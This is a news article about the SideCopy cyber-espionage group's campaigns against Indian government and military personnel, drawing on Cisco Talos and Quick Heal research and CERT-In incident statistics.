A cyber-espionage group by the name of SideCopy has reportedly increased its activities targeting Indian government and military personnel. These activities are said to be a part of a broader campaign to infect potential victims with as many as 4 custom-made Remote Access Trojans (RATs), indicating a major rise in their development operations. The group is regularly attributed to such espionage operations and these intrusions normally conclude with the successful deployment of a plethora of modular plugins such as keyloggers, file enumerators, and browser credential stealers.
In a report by Cisco Talos, one of the largest commercial threat intelligence teams in the world, it has been stated that they noted an expansion in the activities related to malware campaigns run by SideCopy. According to researchers at Talos, the cyber-espionage group has previously used malicious LNK files, that are used to remotely run executable files on Windows, and distribute them through a ‘CetaRAT’ (C#-based RAT). They are also known to rely on ‘Allakore RAT’, a publicly available RAT written in the Delphi programming language.
The origin of SideCopy
An Advanced Persistent Threat (APT) is an elaborate term used to describe a cyber-attack campaign where a remote, illegal intrusion establishes the intruder(s) long-term presence on a network for mining very sensitive and confidential data. SideCopy is one such APT that has been targeting the Indian government and military since 2019.
The group’s operations were first spotted by a threat intelligence team from popular cybersecurity firm Quick Heal, and published on their blog Seqrite in September 2020.
“Quick Heal’s threat intelligence team recently uncovered evidence of an advanced persistent threat (APT) against Indian defence forces. Our analysis shows that many old campaigns and attacks in the past year relate to ‘Operation SideCopy’ by common IOCs.”via Kaplesh Mantri, author of the Seqrite article on Operation SideCopy
According to Quick Heal, this particular operation has only been targeting the Indian government and defence personnel. After every round of reconnaissance, it is understood that the malware modules are regularly updated and seem to be under constant development. Based on the pattern of the attacks, it was suspected that SideCopy was linked to another popular APT group called Transparent Tribe (aka APT36 or Mythic Leopard). It was also noted by Quick Heal’s team that Transparent Tribe has previously been associated with Pakistan.
This group has also previously been linked to several attacks on the Indian government and military, but has reportedly shifted their attention to Afghanistan. It is also suggested that SideCopy has a history of mimicking another well-known APT, Sidewinder, to mislead authorities and security personnel.
Cyberattacks on Indians
As per a report published by the Ministry of Electronics and Information Technology (MeITY), the Computer Emergency and Response Team – India (CERT-IN) recorded over 1.4 million cybersecurity incidents in a 5 year period between 2015-2020. While in 2015, CERT-In recorded 49,455 incidents, 2020 saw a whopping 696,938 incidents documented. These figures were revealed by MeITY after they were asked about the growing threat of cyberattacks on Indian citizens, and also Indian commercial and legal entities.
Another worrying statistic comes from the Internet Crime Report for 2019, published by the US Internet Crime Complaint Centre, a brand of the Federal Bureau of Investigation (FBI). The report states that India ranks 3rd amongst the top 20 countries that are victims of cybercrimes.
“With the proliferation in the internet and mobile phone usage, there is a rise in the number of cybersecurity incidents in the country as well as globally. Proactive tracking by CERT-In including its Cyber Swachhta Kendra and National Cyber Coordination Centre (NCCC) and improved cybersecurity awareness among individuals and organizations across sectors has led to increased reporting of incidents.”VK Saraswat in his NITI Aayog report
Cisco Talos has also released an in-detail report on SideCopy, where it is suggested that this group doesn’t bring anything new to the table, since cyber-espionage activities between India and Pakistan have been well-document over the last decade. The report also shows that it is a well-known fact that the two countries continue to keep tabs on each other.